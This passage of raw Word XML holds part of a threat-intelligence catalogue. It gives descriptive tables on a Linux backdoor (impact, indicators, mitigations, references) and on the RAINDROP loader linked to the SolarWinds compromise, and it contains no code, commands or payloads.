          </w:tcPr>
          <w:p w14:paraId="2DD711FC" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Can support exfiltration of files and command output through its remote communication channel.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="0FE03404" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7078D4B3" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Impact Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6684CE03" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Enables long-term unauthorized access to Linux servers, supports espionage operations, facilitates remote administration by attackers, and increases persistence within enterprise environments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="22F9487B" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="273838A6" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Indicators of Compromise (IOCs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32E1FED0" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Suspicious ELF binaries, unknown daemon processes, unauthorized startup script modifications, encrypted outbound traffic, unusual process names, and persistent malicious services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4138F4B4" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505E6522" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Detection &amp; Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505AAA02" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Monitor Linux startup scripts and services, enable EDR for Linux systems, inspect outbound encrypted traffic, apply least privilege, use file integrity monitoring, audit system binaries, and monitor for unauthorized daemon creation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="23C8CF48" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41107F66" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>References &amp; Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30F43603" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:hyperlink r:id="rId33" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK BlackMould S0564</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2. </w:t>
            </w:r>
            <w:hyperlink r:id="rId34" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK Software Catalog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3. </w:t>
            </w:r>
            <w:hyperlink r:id="rId35" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Intezer</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Winnti</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t xml:space="preserve"> Research</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4. </w:t>
            </w:r>
            <w:hyperlink r:id="rId36" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Kaspersky Threat Research</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5. </w:t>
            </w:r>
            <w:hyperlink r:id="rId37" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Trend Micro Research</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19CFE8A7" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BDD12A8" w14:textId="6B536642" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">RainDrop </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="009B4494" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> S0565</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0"/>
        <w:gridCol w:w="8988"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="06351FBD" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B9851C3" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D858465" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="7D4BF7E3" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F0F51AE" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Name &amp; Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49BD46A5" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>RAINDROP (S0565)</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Malware / Loader / Dropper</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4E91E97B" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6671B866" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33BC017D" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>RAINDROP is a malware loader associated with the SolarWinds compromise and attributed to APT29/NOBELIUM. It was used to deploy additional payloads, including Cobalt Strike beacons, onto compromised systems after initial network access had been established. Unlike TEARDROP, RAINDROP was often deployed laterally within victim environments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="0D284F21" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EB7020D" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Threat Actor Association</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DD69BEA" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>APT29, NOBELIUM, UNC2452</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="07ABDE6E" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E7066C6" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Supported Platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1923A634" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="28832A4E" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6780C4A7" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>ATT&amp;CK Techniques Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52051854" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1105</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Ingress Tool Transfer </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1055</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Process Injection </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1027</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Obfuscated Files or Information </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1036</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
